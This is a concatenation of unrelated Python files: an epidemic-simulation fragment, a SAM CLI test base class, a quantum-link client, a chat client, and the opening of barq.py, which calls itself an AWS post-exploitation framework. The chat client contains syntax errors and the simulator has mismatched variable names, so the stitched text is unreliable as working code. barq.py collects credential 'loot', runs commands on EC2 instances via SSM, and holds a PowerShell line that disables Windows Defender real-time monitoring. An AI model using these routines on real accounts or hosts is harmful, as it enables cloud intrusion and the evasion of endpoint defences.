self.distDead[i][1].append(young[i])
self.distDead[i][2].append(adult[i])
self.distDead[i][3].append(kid[i] + young[i] + adult[i])
kid = [0]*self.dists
adult = [0]*self.dists
young = [0]*self.dists
total = [0]*self.dists
if len(self.curedKid) is 0:
self.curedKidNum.append(0)
else:
self.curedKidNum.append(len(self.curedKid))
for i in range(len(self.curedKid)):
kid[self.people[self.curedKid[i]].getDistrict()] = kid[self.people[self.curedKid[i]].getDistrict()] + 1
if len(self.curedYoung) is 0:
self.curedYoungNum.append(0)
else:
self.curedYoungNum.append(len(self.curedYoung))
for i in range(len(self.curedYoung)):
young[self.people[self.curedYoung[i]].getDistrict()] = young[self.people[self.curedYoung[i]].getDistrict()] + 1
if len(self.curedAdult) is 0:
self.curedAdultNum.append(0)
else:
self.curedAdultNum.append(len(self.curedAdult))
for i in range(len(self.curedAdult)):
adult[self.people[self.curedAdult[i]].getDistrict()] = adult[self.people[self.curedAdult[i]].getDistrict()] + 1
for i in range(self.dists):
self.distCured[i][0].append(kid[i])
self.distCured[i][1].append(young[i])
self.distCured[i][2].append(adult[i])
self.distCured[i][3].append(kid[i] + young[i] + adult[i])
kid = [0] * self.dists
adult = [0] * self.dists
young = [0] * self.dists
total = [0] * self.dists
if len(self.recoveredKid) is 0:
self.recoveredKidNum.append(0)
else:
self.recoveredKidNum.append(len(self.recoveredKid))
for i in range(len(self.recoveredKid)):
kid[self.people[self.recoveredKid[i]].getDistrict()] = kid[self.people[self.recoveredKid[i]].getDistrict()] + 1
if len(self.recoveredYoung) is 0:
self.recoveredYoungNum.append(0)
else:
self.recoveredYoungNum.append(len(self.recoveredYoung))
for i in range(len(self.recoveredYoung)):
young[self.people[self.recoveredYoung[i]].getDistrict()] = young[self.people[self.recoveredYoung[i]].getDistrict()] + 1
if len(self.recoveredAdult) is 0:
self.recoveredAdultNum.append(0)
else:
self.recoveredAdultNum.append(len(self.recoveredAdult))
for i in range(len(self.recoveredAdult)):
adult[self.people[self.recoveredAdult[i]].getDistrict()] = adult[self.people[self.recoveredAdult[i]].getDistrict()] + 1
for i in range(self.dists):
self.distRecovered[i][0].append(kid[i])
self.distRecovered[i][1].append(young[i])
self.distRecovered[i][2].append(adult[i])
self.distRecovered[i][3].append(kid[i] + young[i] + adult[i])
kid = [0] * self.dists
adult = [0] * self.dists
young = [0] * self.dists
total = [0] * self.dists
if len(self.intInfectKid) is 0:
self.intInfectKidNum.append(0)
else:
self.intInfectKidNum.append(len(self.intInfectKid))
for i in range(len(self.intinfectKid)):
kid[self.people[self.intInfectKid[i]].getDistrict()] = kid[self.people[self.intInfectKid[i]].getDistrict()] + 1
if len(self.intInfectYoung) is 0:
self.intInfectYoungNum.append(0)
else:
self.intInfectYoungNum.append(len(self.intInfectYoung))
for i in range(len(self.intInfectYoung)):
young[self.people[self.intInfectYoung[i]].getDistrict()] = young[self.people[self.intInfectYoung[i]].getDistrict()] + 1
if len(self.intInfectAdult) is 0:
self.intInfectAdultNum.append(0)
else:
self.intInfectAdultNum.append(len(self.intInfectAdult))
for i in range(len(self.intinfectAdult)):
adult[self.people[self.intInfectAdult[i]].getDistrict()] = adult[self.people[self.intInfectAdult[i]].getDistrict()] + 1
for i in range(self.dists):
self.distIntInfect[i][0].append(kid[i])
self.distIntInfect[i][1].append(young[i])
self.distIntInfect[i][2].append(adult[i])
self.distIntInfect[i][3].append(kid[i] + young[i] + adult[i])
kid = [0] * self.dists
adult = [0] * self.dists
young = [0] * self.dists
total = [0] * self.dists
if len(self.nonintInfectKid) is 0:
self.nonintInfectKidNum.append(0)
else:
self.nonintInfectKidNum.append(len(self.nonintInfectKid))
for i in range(len(self.nonintInfectKid)):
kid[self.people[self.nonintInfectKid[i]].getDistrict()] = kid[self.people[self.nonintInfectKid[i]].getDistrict()] + 1
if len(self.nonintInfectYoung) is 0:
self.nonintInfectYoungNum.append(0)
else:
self.nonintInfectYoungNum.append(len(self.nonintInfectYoung))
for i in range(len(self.nonintInfectYoung)):
young[self.people[self.nonintInfectYoung[i]].getDistrict()] = young[self.people[self.nonintInfectYoung[i]].getDistrict()] + 1
if len(self.nonintInfectAdult) is 0:
self.nonintInfectAdultNum.append(0)
else:
self.nonintInfectAdultNum.append(len(self.nonintInfectAdult))
for i in range(len(self.nonintInfectAdult)):
adult[self.people[self.nonintInfectAdult[i]].getDistrict()] = adult[self.people[self.nonintInfectAdult[i]].getDistrict()] + 1
for i in range(self.dists):
self.distNonintInfect[i][0].append(kid[i])
self.distNonintInfect[i][1].append(young[i])
self.distNonintInfect[i][2].append(adult[i])
self.distNonintInfect[i][3].append(kid[i] + young[i] + adult[i])
self.asympNum.append(len(self.asympKid) + len(self.asympYoung) + len(self.asympAdult))
self.sympNum.append(len(self.sympKid) + len(self.sympYoung) + len(self.sympAdult))
self.admittedNum.append(len(self.admittedKid) + len(self.admittedYoung) + len(self.admittedAdult))
self.ICUNum.append(len(self.ICUKid) + len(self.ICUYoung) + len(self.ICUAdult))
self.venNum.append(len(self.VenKid) + len(self.VenYoung) + len(self.VenAdult))
self.deadNum.append(len(self.deadKid) + len(self.deadYoung) + len(self.deadAdult))
self.curedNum.append(len(self.curedKid) + len(self.curedYoung) + len(self.curedAdult))
self.recoveredNum.append(len(self.recoveredKid) + len(self.recoveredYoung) + len(self.recoveredAdult))
self.intInfectNum.append(len(self.intInfectKid) + len(self.intInfectYoung) + len(self.intInfectAdult))
self.nonintInfectNum.append(len(self.nonintInfectKid) + len(self.nonintInfectYoung) + len(self.nonintInfectAdult))
# ---- Completed function definition of record() ---#
# ---- Increment the number of days ----#
def anotherDay(self):
for i in range(len(self.asympKid)):
self.people[self.asympKid[i]].increment()
# print("Simulator/anotherday : Incremented " + self.asympKid[i].days)
for i in range(len(self.asympYoung)):
self.people[self.asympYoung[i]].increment()
# print("Simulator/anotherday : Incremented " + self.asympYoung[i].days)
for i in range(len(self.asympAdult)):
self.people[self.asympAdult[i]].increment()
# print("Simulator/anotherday : Incremented " + str(self.people[self.asympAdult[i]].days))
for i in range(len(self.sympKid)):
self.people[self.sympKid[i]].increment()
for i in range(len(self.sympYoung)):
self.people[self.sympYoung[i]].increment()
for i in range(len(self.sympAdult)):
self.people[self.sympAdult[i]].increment()
for i in range(len(self.admittedKid)):
self.people[self.admittedKid[i]].increment()
for i in range(len(self.admittedYoung)):
self.people[self.admittedYoung[i]].increment()
for i in range(len(self.admittedAdult)):
self.people[self.admittedAdult[i]].increment()
for i in range(len(self.ICUKid)):
self.people[self.ICUKid[i]].increment()
for i in range(len(self.ICUYoung)):
self.people[self.ICUYoung[i]].increment()
for i in range(len(self.ICUAdult)):
self.people[self.ICUAdult[i]].increment()
for i in range(len(self.VenKid)):
self.people[self.VenKid[i]].increment()
for i in range(len(self.VenYoung)):
self.people[self.VenYoung[i]].increment()
for i in range(len(self.VenAdult)):
self.people[self.VenAdult[i]].increment()
for i in range(len(self.deadAdult)):
self.people[self.deadAdult[i]].increment()
for i in range(len(self.deadYoung)):
self.people[self.deadYoung[i]].increment()
for i in range(len(self.deadKid)):
self.people[self.deadKid[i]].increment()
for i in range(len(self.curedAdult)):
self.people[self.curedAdult[i]].increment()
for i in range(len(self.curedYoung)):
self.people[self.curedYoung[i]].increment()
for i in range(len(self.curedKid)):
self.people[self.curedKid[i]].increment()
self.update()
# ---- Completed function definition of anotherDay() ----#
def firstQuarter(self):
lim = int(len(self.people) / 4)
self.writer.log("From first " +str(lim))
for i in range(lim):
self.setclosest(i)
def secondQuarter(self):
lim1 = int(len(self.people)/ 4)
lim2 = int(len(self.people) / 2)
self.writer.log("From second " + str(lim1)+ " : "+str(lim2))
for i in range(lim1, lim2):
self.setclosest(i)
def thirdQuarter(self):
lim1 = int(len(self.people) / 2)
lim2 = int((3*len(self.people)) / 4)
self.writer.log("From third " + str(lim1) + " : " + str(lim2))
for i in range(lim1, lim2):
self.setclosest(i)
def fourthQuarter(self):
lim = int(3 *len(self.people) / 4)
self.writer.log("From fourth " + str(lim) + " : " + str(len(self.people)))
for i in range(lim, len(self.people)):
self.setclosest(i)
def clear(self):
self.distAsymp = [[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]]]
self.distSymp = [[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]]]
self.distAdmitted = [[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]]]
self.distCured = [[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]]]
self.distRecovered = [[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]]]
self.distICU = [[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]]]
self.distVen = [[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]]]
self.distDead = [[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]]]
self.distIntInfect = [[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]]]
self.distNonintInfect = [[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]]]
self.pr = person()
self.curedKid = []
self.curedYoung = []
self.curedAdult = []
self.recoveredKid = []
self.recoveredYoung = []
self.recoveredAdult = []
self.intInfectKid = []
self.intInfectYoung = []
self.intInfectAdult = []
self.nonintInfectKid = []
self.nonintInfectYoung = []
self.nonintInfectAdult = []
self.asympKid = []
self.asympYoung = []
self.asympAdult = []
self.admittedKid = []
self.admittedYoung = []
self.admittedAdult = []
self.ICUKid = []
self.ICUYoung = []
self.ICUAdult = []
self.VenKid = []
self.VenYoung = []
self.VenAdult = []
self.deadKid = []
self.deadYoung = []
self.deadAdult = []
self.sympYoung = []
self.sympKid = []
self.sympAdult = []
self.asympKidNum = []
self.asympYoungNum = []
self.asympAdultNum = []
self.admittedKidNum = []
self.admittedYoungNum = []
self.admittedAdultNum = []
self.ICUKidNum = []
self.ICUYoungNum = []
self.ICUAdultNum = []
self.VenKidNum = []
self.VenYoungNum = []
self.VenAdultNum = []
self.sympYoungNum = []
self.sympKidNum = []
self.sympAdultNum = []
self.deadYoungNum = []
self.deadKidNum = []
self.deadAdultNum = []
self.curedYoungNum = []
self.curedKidNum = []
self.recoveredAdultNum = []
self.recoveredYoungNum = []
self.recoveredKidNum = []
self.intInfectKidNum = []
self.intInfectYoungNum = []
self.intInfectAdultNum = []
self.nonintInfectKidNum = []
self.nonintInfectYoungNum = []
self.nonintInfectAdultNum = []
self.curedAdultNum = []
self.asympNum = []
self.sympNum = []
self.admittedNum = []
self.venNum = []
self.ICUNum = []
self.deadNum = []
self.curedNum = []
self.recoveredNum = []
self.intInfectNum = []
self.nonintInfectNum = []
for per in self.people:
self.mask_dist_percent = 0
self.immune_days = 0
self.close_circle = 0
per.clear()
# ---- Pretty much the most important function. It performs the simulation ----#
def simulate(self):
# ---- Bringing in the data of the people. It would be stored in people[] ---- #
self.people = self.dataPool.getPeople()
self.writer.log("Simulator/sim : " + str(len(self.people)) + " people included in the simulation ")
# ---- Data had been brought in ----
# ---- Finding the closest people to each person, and storing their ids in closest[] ----
m = 0
counter = 1
for i in range(len(self.people)):
self.setcontacts(i)
m = m+1
if(m >= 25000):
print("Finish setting the closest of "+str(m*counter)+" people")
m = 0
counter = counter+1
t1 = threading.Thread(target=self.firstQuarter, args=())
t2 = threading.Thread(target=self.secondQuarter, args=())
t3 = threading.Thread(target=self.thirdQuarter, args=())
t4 = threading.Thread(target=self.fourthQuarter, args=())
t1.start()
t2.start()
t3.start()
t4.start()
t1.join()
t2.join()
t3.join()
t4.join()
self.writer.log("Simulator/sim : Proximate people of each person set successfully")
# ---- Closest people of each person had been set ---- #
self.writer.log("\nSimulator/sim : Starting simulator")
for case in range(6):
if case is 0:
# print("Woah")
self.mask_dist_percent = 100
self.immune_days = 90
elif case is 1:
self.mask_dist_percent = 75
self.immune_days = 90
elif case is 2:
self.mask_dist_percent = 50
self.immune_days = 90
elif case is 3:
self.mask_dist_percent = 100
self.immune_days = 180
elif case is 4:
self.mask_dist_percent = 75
self.immune_days = 180
elif case is 5:
self.mask_dist_percent = 50
self.immune_days = 180
self.writer.log("\tRunnning case "+str(case+1))
print("\tRunnning case "+str(case+1))
self.asymp(0) # Just one person is infected initially
self.people[0].setStatus("Asymptamatic")
self.people[0].setLimit(14)
dist_mark = self.dataPool.dist_mark
left = len(dist_mark)
self.writer.log("We introduce one new carrier in each district every week.")
for day in range(self.days):
flag =True
print("Simulating day: " + str(int(day)))
if (day % 7 == 0) and (day < 300):
for i in range(len(dist_mark)):
if dist_mark[i] == dist_mark[-1]:
if(len(dist_mark)!=1):
break
if(left==1):
end = len(self.people)-1
# else:
# end = dist_mark[i+1]-1
while (flag):
left = left -1
ran = random.randint(dist_mark[i],end)
if (self.people[ran].isHealthy()):
self.asymp(ran)
self.people[ran].setStatus("Asymptamatic")
self.people[ran].setLimit(14)
print("\t\tIntroduced new carrier on day : " + str(day))
flag = False
for i in range(len(self.people)):
self.presentday = int(day)
self.coronaSpree(i)
self.anotherDay()
self.record()
self.writer.createRecords(self, case)
self.clear()
self.writer.log("\nSimulator/sim : Completed the simulation of " + str(len(self.people)) + " people over " + str(self.days+1) + " days.")
|
start_api_integ_base.py
|
import shutil
import uuid
from typing import Optional, Dict
from unittest import TestCase, skipIf
import threading
from subprocess import Popen
import time
import os
import random
from pathlib import Path
from tests.testing_utils import SKIP_DOCKER_MESSAGE, SKIP_DOCKER_TESTS, run_command
@skipIf(SKIP_DOCKER_TESTS, SKIP_DOCKER_MESSAGE)
class StartApiIntegBaseClass(TestCase):
template: Optional[str] = None
container_mode: Optional[str] = None
parameter_overrides: Optional[Dict[str, str]] = None
binary_data_file: Optional[str] = None
integration_dir = str(Path(__file__).resolve().parents[2])
build_before_invoke = False
build_overrides: Optional[Dict[str, str]] = None
@classmethod
def setUpClass(cls):
# This is the directory for tests/integration which will be used to file the testdata
# files for integ tests
cls.template = cls.integration_dir + cls.template_path
if cls.binary_data_file:
cls.binary_data_file = os.path.join(cls.integration_dir, cls.binary_data_file)
if cls.build_before_invoke:
cls.build()
cls.port = str(StartApiIntegBaseClass.random_port())
cls.thread = threading.Thread(target=cls.start_api())
cls.thread.setDaemon(True)
cls.thread.start()
@classmethod
def build(cls):
command = "sam"
if os.getenv("SAM_CLI_DEV"):
command = "samdev"
command_list = [command, "build"]
if cls.build_overrides:
overrides_arg = " ".join(
["ParameterKey={},ParameterValue={}".format(key, value) for key, value in cls.build_overrides.items()]
)
command_list += ["--parameter-overrides", overrides_arg]
working_dir = str(Path(cls.template).resolve().parents[0])
run_command(command_list, cwd=working_dir)
@classmethod
def start_api(cls):
command = "sam"
if os.getenv("SAM_CLI_DEV"):
command = "samdev"
command_list = [command, "local", "start-api", "-t", cls.template, "-p", cls.port]
if cls.container_mode:
command_list += ["--warm-containers", cls.container_mode]
if cls.parameter_overrides:
command_list += ["--parameter-overrides", cls._make_parameter_override_arg(cls.parameter_overrides)]
cls.start_api_process = Popen(command_list)
# we need to wait some time for start-api to start, hence the sleep
time.sleep(5)
@classmethod
def _make_parameter_override_arg(self, overrides):
return " ".join(["ParameterKey={},ParameterValue={}".format(key, value) for key, value in overrides.items()])
@classmethod
def tearDownClass(cls):
# After all the tests run, we need to kill the start-api process.
cls.start_api_process.kill()
@staticmethod
def random_port():
return random.randint(30000, 40000)
@staticmethod
def get_binary_data(filename):
if not filename:
return None
with open(filename, "rb") as fp:
return fp.read()
class WatchWarmContainersIntegBaseClass(StartApiIntegBaseClass):
temp_path: Optional[str] = None
template_path: Optional[str] = None
code_path: Optional[str] = None
docker_file_path: Optional[str] = None
@classmethod
def setUpClass(cls):
cls.temp_path = str(uuid.uuid4()).replace("-", "")[:10]
working_dir = str(Path(cls.integration_dir).resolve().joinpath(cls.temp_path))
if Path(working_dir).resolve().exists():
shutil.rmtree(working_dir)
os.mkdir(working_dir)
cls.template_path = f"/{cls.temp_path}/template.yaml"
cls.code_path = f"/{cls.temp_path}/main.py"
cls.docker_file_path = f"/{cls.temp_path}/Dockerfile"
if cls.template_content:
cls._write_file_content(cls.template_path, cls.template_content)
if cls.code_content:
cls._write_file_content(cls.code_path, cls.code_content)
if cls.docker_file_content:
cls._write_file_content(cls.docker_file_path, cls.docker_file_content)
super().setUpClass()
@classmethod
def _write_file_content(cls, path, content):
with open(cls.integration_dir + path, "w") as f:
f.write(content)
@classmethod
def tearDownClass(cls):
working_dir = str(Path(cls.integration_dir).resolve().joinpath(cls.temp_path))
if Path(working_dir).resolve().exists():
shutil.rmtree(working_dir)
super().tearDownClass()
|
b_qim_client.py
|
import orsoqs
import json
import signal
import sys
import threading
import matplotlib.pyplot as plt
import numpy as np
import zmq
try:
from Queue import Queue
except ImportError:
from queue import Queue
class qim_client:
def sdc_encode_char(self, c):
'''
Encode a character into SDC flags.
'''
c = ord(c)
ret = str((c & 0x03) >> 0) + \
str((c & 0x0c) >> 2) + \
str((c & 0x30) >> 4) + \
str((c & 0xc0) >> 6)
return ret
def sdc_encode_str(self, s):
'''
Encode a string of characters into SDC flags.
'''
return ''.join([self.sdc_encode_char(c) for c in str(s)])
def sdc_decode_char(self, b):
'''
Decode a character from SDC flags.
'''
if len(b) != 4:
raise ValueError('Length of b not 4')
b = [int(x) for x in b]
return chr((b[0] << 0) \
+ (b[1] << 2) \
+ (b[2] << 4) \
+ (b[3] << 6)
)
def sdc_decode_str(self, s):
'''
Decode a string from SDC flags.
'''
if len(s) % 4 != 0:
raise ValueError('Length of s not multiple of 4')
ret = ''
for i in range(0, len(s), 4):
ret += self.sdc_decode_char(s[i:i+4])
return ret
def get_basis(self):
if(self.basisLoc == 7):
self.basisLoc = 0
self.basis = ord(self.bases.read(1))
ret = (self.basis >> self.basisLoc) & 1
self.basisLoc += 1
return ret
def listen_cb(self, msg):
'''
A really simple callback function that saves what is received.
'''
if msg[-1] == '\0':
msg = msg[:-1]
response = json.loads(msg)
if 'error' in response and response['error'] == True:
raise Exception('Failure in listen_cb()')
elif 'result' in response:
meas = int(response['result'])
ber = 0
bas = 'x'
if meas == 1 or meas == 2:
ber = 1
if self.get_basis() == 1:
bas = 'z'
self.ber.put([bas, ber])
return '_'
else:
raise Exception('Failure in listen_cb()')
def plotter(self):
datal = 25
windowl = 100
xdata = [0]*datal
zdata = [0]*datal
xwindow = [0]*windowl
xewindow = [0]*windowl
zwindow = [0]*windowl
zewindow = [0]*windowl
plt.ion()
x = range(1,windowl+1)
y = [0]*windowl
fig, ((ax, az), (axe, aze)) = plt.subplots(2, 2, figsize=(10,5))
ax.set_ylim([0, 1])
az.set_ylim([0, 1])
axe.set_ylim([0, 1])
aze.set_ylim([0, 1])
line1, = ax.plot(x, y, 'b.')
line2, = az.plot(x, y, 'b.')
line1e, = axe.plot(x, y, 'b.')
line2e, = aze.plot(x, y, 'b.')
# this is very inefficient
while True:
# ('x', 'val')
item = self.ber.get()
if item[0] == 'x':
xdata = xdata[1:] + [item[1]]
xwindow = xwindow[1:] + [np.mean(xdata)]
line1.set_ydata(xwindow)
xewindow = xewindow[1:] + [np.std(xdata)]
line1e.set_ydata(xewindow)
zwindow = zwindow[1:] + [-100]
line2.set_ydata(zwindow)
zewindow = zewindow[1:] + [-100]
line2e.set_ydata(zewindow)
else:
zdata = zdata[1:] + [item[1]]
zwindow = zwindow[1:] + [np.mean(zdata)]
line2.set_ydata(zwindow)
zewindow = zewindow[1:] + [np.std(zdata)]
line2e.set_ydata(zewindow)
xwindow = xwindow[1:] + [-100]
line1.set_ydata(xwindow)
xewindow = xewindow[1:] + [-100]
line1e.set_ydata(xewindow)
fig.canvas.draw()
def __init__(self, receiveCb, afIEndpoint, afOEndpoint, basesFile):
signal.signal(signal.SIGINT, self.signal_handler)
self.zcontext = zmq.Context(1)
self.orclient = orsoqs.create_client()
self.osocket = orsoqs.connect(self.orclient, afIEndpoint, orsoqs.CON_PUSH)
self.isocket = orsoqs.connect(self.orclient, afOEndpoint, orsoqs.CON_WAIT)
self.isocket.set_proc_callback(self.listen_cb)
self.bases = open(basesFile)
self.basisLoc = 0
self.basis = ord(self.bases.read(1))
self.ber = Queue()
self.plotter = threading.Thread(target=self.plotter)
self.plotter.start()
def signal_handler(self, signum, frame):
pass
def send(self, address, msg):
'''
Send a message to a given address, where address is a numerical IP in
network byte order.
'''
request = {
'action' : 'push',
'method' : 'tx',
'parameters' : [
int(address),
int(14450),
''.join([self.sdc_encode_str(msg)])
]
}
request = json.dumps(request)
# We have automatic Python garbage collection from SWIG
request = orsoqs.create_msg(request, len(request)+1)
# send_msg() sends our message and returns a response message
# str() creates a copy of the response message string
response = orsoqs.send_msg(self.osocket, request).str()
response = json.loads(response)
if 'error' in response and response['error'] == True:
return False
elif 'result' in response and response['result'] == True:
return True
else:
return False
test = qim_client(None, 'tcp://127.0.0.1:12346', 'tcp://127.0.0.1:12345', 'bases.bin')
signal.pause()
|
user.py
|
import socket
import threading
username = input("Choose your username: ")
user = socket.socket(sokcet.AF_INET, socket.SOCK_STREAM)
ip = '127.0.0.1'
port = 55555
user.connect((ip, port))
# defining the function to receive the user's data
def receive():
while True:
try:
msg = user.recv(2048).decode('ascii')
if(msg == 'USER_NAME':
user.send(username.encode('ascii'))
else:
print(msg)
except:
print("Something went wrong")
user.close()
break
# defining the function to enable the user to send new messages
def new_message():
while True:
msg = f'{username}: {input("")}'
user.send(msg.encode('ascii'))
receive_thread = threading.Thread(target=receive)
receive_thread.start()
new_message_thread = threading.Thread(target=new_message)
new_message_thread.start()
|
barq.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import boto3, json
from clint.arguments import Args
from clint.textui import puts, colored, indent, prompt, validators
import time
from prettytable import PrettyTable
import string
import os
import random
import subprocess
import readline
import sys
import signal
import re
from threading import Event, Thread
import logging
from getpass import getpass
from pygments import highlight
from pygments.lexers.data import JsonLexer
from pygments.formatters.terminal import TerminalFormatter
#signing commit again
PY2 = sys.version_info[0] == 2
PY3 = sys.version_info[0] == 3
if PY3:
string_types = str,
raw_input = input
else:
string_types = basestring,
def id_generator(size=10, chars=string.ascii_uppercase + string.digits):
return ''.join(random.choice(chars) for _ in range(size))
def set_session_region(region):
global my_aws_creds
mysession = None
try:
if my_aws_creds['aws_session_token'] == '':
mysession = boto3.session.Session(aws_access_key_id=my_aws_creds['aws_access_key_id'],aws_secret_access_key=my_aws_creds['aws_secret_access_key'],region_name=region)
else:
mysession = boto3.session.Session(aws_access_key_id=my_aws_creds['aws_access_key_id'],aws_secret_access_key=my_aws_creds['aws_secret_access_key'],region_name=region,aws_session_token=my_aws_creds['aws_session_token'])
return mysession
except:
return None
def color(string, color=None):
"""
Change text color for the Linux terminal. (Taken from Empire: https://github.com/EmpireProject/Empire/blob/master/lib/common/helpers.py)
"""
attr = []
# bold
attr.append('1')
if color:
if color.lower() == "red":
attr.append('31')
elif color.lower() == "green":
attr.append('32')
elif color.lower() == "yellow":
attr.append('33')
elif color.lower() == "blue":
attr.append('34')
return '\x1b[%sm%s\x1b[0m' % (';'.join(attr), string)
else:
if string.strip().startswith("[!]"):
attr.append('31')
return '\x1b[%sm%s\x1b[0m' % (';'.join(attr), string)
elif string.strip().startswith("[+]"):
attr.append('32')
return '\x1b[%sm%s\x1b[0m' % (';'.join(attr), string)
elif string.strip().startswith("[..]"):
attr.append('33')
return '\x1b[%sm%s\x1b[0m' % (';'.join(attr), string)
elif string.strip().startswith("[*]"):
attr.append('34')
return '\x1b[%sm%s\x1b[0m' % (';'.join(attr), string)
else:
return string
def start():
"""
The start of the barq functionality.
:return: None
"""
signal.signal(signal.SIGINT, signal.default_int_handler)
args = Args()
puts(color(asciilogo,'blue'))
puts(color("barq: The AWS post exploitation framework written by Mohammed Aldoub @Voulnet","green"))
global loot_creds
global ec2instances
global menu_stack
global my_aws_creds
global secgroups
global command_invocations
global lambdafunctions
menu_stack = []
loot_creds = {'secrets':[],'tokens':[],'parameters':[]}
ec2instances = {'instances':[]}
lambdafunctions = {'functions':[]}
secgroups = {'groups':[]}
my_aws_creds = {}
command_invocations = {'commands':[]}
global logger
logger = logging.getLogger('log')
logger.setLevel(logging.ERROR)
logpath = 'log.log'
ch = logging.FileHandler(logpath)
ch.setFormatter(logging.Formatter('%(asctime)s: %(message)s'))
logger.addHandler(ch)
logger.error('calling start')
myargs = dict(args.grouped)
if '--help' in myargs or '-h' in myargs:
help = """
barq framework options:
-h --help - This menu
-k --keyid - The AWS access key id
-s --secretkey - The AWS secret access key. (Needs --keyid, mandatory)
-r --region - The default region to use. (Needs --keyid)
-t --token - The AWS session token to use. (Needs --keyid, optional)
"""
print (help)
exit(0)
if '--keyid' in myargs or '-k' in myargs:
try:
aws_access_key_id = myargs['--keyid'][0]
except:
aws_access_key_id = myargs['-k'][0]
if '--secretkey' not in myargs and '-s' not in myargs:
puts(color("[!] using --secretkey is mandatory with --keyid"))
exit()
try:
aws_secret_access_key = myargs['--secretkey'][0]
except:
aws_secret_access_key = myargs['-s'][0]
if '--region' not in myargs and '-r' not in myargs:
puts(color("[!] using --region is mandatory with --keyid"))
exit()
try:
region_name = myargs['--region'][0]
except:
region_name = myargs['-r'][0]
if '--token' in myargs or '-t' in myargs:
try:
aws_session_token = myargs['--token'][0]
except:
aws_session_token = myargs['-t'][0]
else:
aws_session_token = ''
set_aws_creds_inline(aws_access_key_id,aws_secret_access_key,region_name,aws_session_token)
menu_forward('main')
def menu_forward(menu):
"""
Go forward to a new menu (Push to menu stack)
:param menu: The menu to go to
:return: None
"""
global menu_stack
global logger
if menu == 'training':
menu_stack.append(menu)
training_loop()
elif menu == 'ec2instances':
menu_stack.append(menu)
instances_loop()
else:
logger.error('calling menu forward for main')
menu_stack.append('main')
main_loop()
def menu_backward():
"""
Go back to previous menu (Pull from menu stack)
:return: None
"""
global menu_stack
try:
current_menu = menu_stack.pop()
next_menu = menu_stack[-1]
if next_menu == 'main':
go_to_menu(next_menu)
elif next_menu == 'training':
go_to_menu(next_menu)
elif next_menu == 'ec2instances':
go_to_menu(next_menu)
except Exception as e:
print(e)
pass
def go_to_menu(menu):
"""
Go to a menu directly, bypassing the stack. This is used for functionality that involves interaction under a particular menu,
and therefore does not add a menu to the stack.
:param menu: menu to go to directly.
:return: None
"""
if menu == 'main':
main_loop()
elif menu == 'training':
training_loop()
elif menu == 'ec2instances':
instances_loop()
def handle_menu():
"""
Pop the top menu from the stack and go to it.
:return: None
"""
global menu_stack
try:
current_menu = menu_stack.pop()
if current_menu == 'main':
main_loop()
elif current_menu == 'ec2instances':
instances_loop()
elif current_menu == 'training':
training_loop()
else:
main_loop()
except Exception as e:
print(e)
main_loop()
def training_loop():
"""
The menu handler loop for the training menu. Reads commands and send them to the processor, otherwise shows the menu prompt.
:return: None
"""
try:
command = ''
while command == '':
try:
readline.set_completer_delims(' \t\n;')
readline.parse_and_bind("tab: complete")
readline.set_completer(trainingcomplete)
command = raw_input('barq ' +color('training','yellow') + ' > ' )
except Exception as e:
print(e)
#command = prompt.query('aws sheller training > ', validators=[])
command = str(command)
process_training_command(command)
except KeyboardInterrupt as k:
print("CTRL C clicked in training")
menu_backward()
def disable_windows_defender():
"""
The powershell command to disable windows defender.
:return: Returns the powershell command to disable win defender.
"""
return "Set-MpPreference -DisableRealtimeMonitoring $true"
def enable_windows_defender():
"""
Enable Windows Defender Powershell command.
:return: Returns the powershell command to enable win defender again.
"""
return "Set-MpPreference -DisableRealtimeMonitoring $false"
def wait_for_command_invocation(ssmclient, commandid,instanceid):
"""
:param ssmclient: The ssm (Systems manager) client associated with the required region and account.
:param commandid: The id of the command to check invocation results for.
:param instanceid: The id of the instance on which the command was run.
:return: Returns a tuple of success state and AWS response json in full.
"""
time.sleep(10)
result = ssmclient.get_command_invocation(CommandId=commandid,InstanceId=instanceid)
puts(color('[..] Waiting for command to return.... This will take some time'))
while result['Status'] in {'InProgress', 'Pending','Waiting'}:
time.sleep(10)
result = ssmclient.get_command_invocation(CommandId=commandid,InstanceId=instanceid)
if result['Status'] in {'Failed','TimedOut','Cancelling','Cancelled'}:
puts(color('[!] ERROR: %s'%result['StandardErrorContent']))
return False, result
puts(color('[*] Status of the command is: %s'%result['Status']))
if result['Status'] == 'Success':
puts(color('[+] Success! The command executed successfully. Output is:'))
puts(color(result['StandardOutputContent'],'blue'))
return True, result
